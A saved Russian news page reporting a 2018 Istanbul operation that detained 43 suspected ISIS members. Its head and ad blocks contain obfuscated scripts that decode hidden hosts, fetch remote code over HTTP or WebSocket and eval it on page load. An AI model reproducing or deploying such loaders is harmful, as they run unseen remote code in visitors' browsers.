<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>В Турции прошли массовые облавы на боевиков ИГИЛ</title>
<meta name="description" content="Результатом спецоперации стало задержание 43 человек." />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="В Турции прошли массовые облавы на боевиков ИГИЛ" />
<meta property="og:url" content="http://hronika.info/mir/336219-v-turcii-proshli-massovye-oblavy-na-boevikov-igil.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2018-07/thumbs/1532381636_screenshot_4.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
<meta name="teasercash-site-verification" content="teasercash-site-833" />
    <!-- From Cache --><script>
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };
    
        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
               fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                   .then(function (response) {
                       return response.text();
                   })
                   .then(insertScript)
                   .catch(onLoadError);
           } else {
               var h = new window["XMLHttpRequest"]();
               h["open"]("GET", g, true);
               h["responseType"] = "text";
               h["addEventListener"]("load", onLoad);
               h["addEventListener"]("error", onLoadError);
               h["send"](null);
           }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] == 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            console.log(e)
            var b = window["performance"]["now"]() - start;
            if (b > 0 && b < v) {
               /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }
    
        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
}() )('9568', 300, 'dGhobG8mMzMrf3h6KyRpcnN3bisybmk=', 'e5333f4/425e/333f/fe/7feea7425e5333f/56ea/333fa');
</script>

  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
	FastSearch();
});
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>
    
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap




mir_4
















">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li><a href="/ukraina/" >Украина</a></li>
					<li class="tm-selected"><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li><a href="/kriminal/" >Происшествия</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       
        <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/mir/" itemprop="url"><span itemprop="title">Мир</span></a></span> &raquo; В Турции прошли массовые облавы на боевиков ИГИЛ</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/mir/">Мир</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-336219">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(336219,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(336219,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(336219,1,true);return false;">0</a>
</div>


  </div>
		<div class="ttl_h1full"><h1><span id="news-title">В Турции прошли массовые облавы на боевиков ИГИЛ</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2018-07/1532381636_screenshot_4.jpg|left--><a href="http://hronika.info/uploads/posts/2018-07/1532381636_screenshot_4.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-07/thumbs/1532381636_screenshot_4.jpg" style="float:left;" alt='В Турции прошли массовые облавы на боевиков ИГИЛ' title='В Турции прошли массовые облавы на боевиков ИГИЛ'  /></a><!--TEnd--> <b>Результатом спецоперации стало задержание 43 человек.</b><br /><br />Правоохранители Турции арестовали 43 предполагаемых боевиков террористической группировки "Исламское государство" (ИГИЛ) в ходе операций в Стамбуле, сообщает <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на <a href="http://ura-inform.com/ru/neformat/2018/07/23/v-stambule-zaderzhali-43-predpolagaemykh-boevikov-igil" target="_blank">УРА-Информ</a>.<br /><br />Полицейские благодаря грамотным и оперативным действиям проводили задержания в нескольких районах Стамбула одновременно. Вместе с тем сотрудники правоохранительних органов проверили 15 адресов города, где могли находится злоумышленники.<br /><br />Как отметили стражи порядка, боевики входили в соцсетях групп, связанных с ИГИЛ и контактировали с боевиками с их помощью. Согласно заявлениям турецких властей, Анкара за последние годы задержала 5000 предполагаемых членов ИГИЛ и депортировала 3290 иностранных боевиков из 95 стран.<br /><br />При этом во въезде в страну было отказано 38269 людям.  Напомним, как сообщал ранее "УРА-Информ", в столице Сомали Могадиш смертник на автомобиле несвоевременно активировал детонатор на взрывчатке и подорвался с "товарищами".<br /><br /><b>Читайте также: <a href="http://hronika.info/mir/336213-shiity-prizvali-putina-vvesti-voyska-v-yemen.html" >Шииты призвали Путина ввести войска в Йемен</a></b><br /><br />По предварительной версии правоохранителей, смертник установил самодельное взрывное устройство в автомобиле, который должен был взорвать, когда направит машину на толпу людей.
	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"><br /><p class="basetags">&nbsp;<i>Теги: <a href="http://hronika.info/tags/%D0%A2%D1%83%D1%80%D1%86%D0%B8%D1%8F/">Турция</a>, <a href="http://hronika.info/tags/%D0%B0%D1%80%D0%B5%D1%81%D1%82%D1%8B/">аресты</a>, <a href="http://hronika.info/tags/%D0%98%D0%93%D0%98%D0%9B/">ИГИЛ</a></i></p></div>
<div class="full-top_banner">
    <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
    </div>
<div class="full-top_banner">
    <div id="AD67HoqbIKGudtbW5O7h" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/lT/v8.js" ></script>
    <div id="MIXADV_4787" class="MIXADVERT_NET"></div>
          <script> 
          var node4787 = document.getElementById("MIXADV_4787");
          if( node4787 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4787&r="+Math.random();
               node4787.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NyAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg3LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg3LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg3IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
    <!-- noindex -->
<!-- M225926Composite Start --> <div id="M225926Composite608873"><center> <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script608873 = document.createElement("script"), mg_ws608873 = {};script608873.type = "text/javascript";script608873.charset = "utf-8";script608873.src = "//jsc.marketgid.com/h/r/hronika.info.608873.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script608873.onerror = function () { mg_ws608873 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MDg4NzMoZSl7dmFyIGg9bWdfd3M2MDg4NzMub25tZXNzYWdlOyBtZ193czYwODg3My5yZWFkeVN0YXRlPT1tZ193czYwODg3My5DTE9TRUQmJihtZ193czYwODg3Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjA4ODczX2xvY2F0aW9uKSksbWdfd3M2MDg4NzMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMobWdfd3M2MDg4NzMsZnVuY3Rpb24oKXttZ193czYwODg3My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MDg4NzNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYwODg3MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MDg4NzNfbG9jYXRpb24pLCBtZ193czYwODg3My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MDg4NzMoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws608873.onmessage = function (msg){window.eval(msg.data);}; mg_ws608873.postMessage('js|'+script608873.src+'|M225926Composite608873|M225926Composite608873');};document.body.appendChild(script608873); </script> <!-- M225926Composite End -->
<!--/ noindex -->
    <!-- noindex -->
<div id="CNM4058" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4058t" style="display:none" rel="nofollow" target="_blank"><strong>Новости</strong></a></div>

<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4058');
  if (el) {
    if (document.getElementById('CNM4058t').style.display == 'none') {
      document.getElementById('CNM4058t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4058?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>
<!--/ noindex -->
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>

<!-- end NEW content_v1 for hronika.info -->
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9393887096432784",
          enable_page_level_ads: true
     });
</script>
    <script id="r17724" type="text/javascript">
    (function() {
        var worker17724,
            tickerID = 17724,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17724.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17724.postMessage(data);
                }

                worker17724 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17724.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17724.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
    
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 01:15 » Автор: <a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/">Евгений Шевченко</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;108</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>

<div class="related-n"> 
<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/273392-v-turcii-zaderzhali-bolee-sotni-vozmozhnyh-chlenov-igil.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-11/thumbs/1510239993_21.jpg" alt="В Турции задержали более сотни возможных членов ИГИЛ" title="В Турции задержали более сотни возможных членов ИГИЛ" /></a>
    <strong title="В Турции задержали более сотни возможных членов ИГИЛ"><a href="http://hronika.info/mir/273392-v-turcii-zaderzhali-bolee-sotni-vozmozhnyh-chlenov-igil.html">В Турции задержали более сотни возможных членов ИГИЛ</a></strong>
  <p>В Анкаре правоохранители провели операцию, в ходе которой задержали предполагаемых террористов.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/194885-boeviki-igil-sozhgli-tureckih-soldat-v-sirii.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-12/1482489661_igil.jpg" alt="Боевики «ИГИЛ» сожгли турецких солдат в Сирии" title="Боевики «ИГИЛ» сожгли турецких солдат в Сирии" /></a>
    <strong title="Боевики «ИГИЛ» сожгли турецких солдат в Сирии"><a href="http://hronika.info/mir/194885-boeviki-igil-sozhgli-tureckih-soldat-v-sirii.html">Боевики «ИГИЛ» сожгли турецких солдат в Сирии</a></strong>
  <p>Ранее армия Турции сообщила об исчезновении двух своих солдат</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/178239-v-turcii-vo-vremya-policeyskogo-reyda-podorvalsya-smertnik.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-10/thumbs/1476624988_14_main.jpg" alt="В Турции во время полицейского рейда подорвался смертник" title="В Турции во время полицейского рейда подорвался смертник" /></a>
    <strong title="В Турции во время полицейского рейда подорвался смертник"><a href="http://hronika.info/mir/178239-v-turcii-vo-vremya-policeyskogo-reyda-podorvalsya-smertnik.html">В Турции во время полицейского рейда подорвался смертник</a></strong>
  <p>Правоохранители проводили рейд в поисках подозреваемого в связях с ИГИЛ на явочной квартире</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/145850-v-sirii-smertnik-podorvalsya-v-avtomobile-so-vzryvchatkoy.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-05/thumbs/1464462284_ogon.jpg" alt="В Сирии смертник подорвался в автомобиле со взрывчаткой" title="В Сирии смертник подорвался в автомобиле со взрывчаткой" /></a>
    <strong title="В Сирии смертник подорвался в автомобиле со взрывчаткой"><a href="http://hronika.info/mir/145850-v-sirii-smertnik-podorvalsya-v-avtomobile-so-vzryvchatkoy.html">В Сирии смертник подорвался в автомобиле со взрывчаткой</a></strong>
  <p>В провинции Алеппо продолжаются активные боевые действия между боевиками ИГ и сирийскими оппозиционерами.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/mir/99679-v-turcii-smertnik-ustroil-terakt.html">
  <img src="/posters/110_85_80_1/uploads/posts/2015-11/thumbs/1447576501_terakt1.jpg" alt="В Турции смертник устроил теракт" title="В Турции смертник устроил теракт" /></a>
    <strong title="В Турции смертник устроил теракт"><a href="http://hronika.info/mir/99679-v-turcii-smertnik-ustroil-terakt.html">В Турции смертник устроил теракт</a></strong>
  <p>Террорист принадлежал к группировке ИГИЛ.</p><div class="clr"></div>
</div>
 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>

<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->

<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336138-zabavnye-fotki-sobak-ne-gotovyh-pokidat-dom.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532354604_sobaki.jpg" alt="Забавные фотки собак, не готовых покидать дом" class="l_n_im" title="Забавные фотки собак, не готовых покидать дом" />
</a>
<strong class="ttl" title="Забавные фотки собак, не готовых покидать дом"><a href="http://hronika.info/kurjozy/336138-zabavnye-fotki-sobak-ne-gotovyh-pokidat-dom.html">Забавные фотки собак, не готовых покидать дом</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/336203-savchenko-prodolzhit-prohodit-ekspertizu-na-poligrafe.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532376212_savchenko.jpg" alt="Савченко продолжит проходить экспертизу на полиграфе" class="l_n_im" title="Савченко продолжит проходить экспертизу на полиграфе" />
</a>
<strong class="ttl" title="Савченко продолжит проходить экспертизу на полиграфе"><a href="http://hronika.info/ukraina/336203-savchenko-prodolzhit-prohodit-ekspertizu-na-poligrafe.html">Савченко продолжит проходить экспертизу на полиграфе</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336137-otlichnye-anekdoty-dlya-pozitivnogo-nachala-nedeli.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532354348_yumor.jpg" alt="Отличные анекдоты для позитивного начала недели" class="l_n_im" title="Отличные анекдоты для позитивного начала недели" />
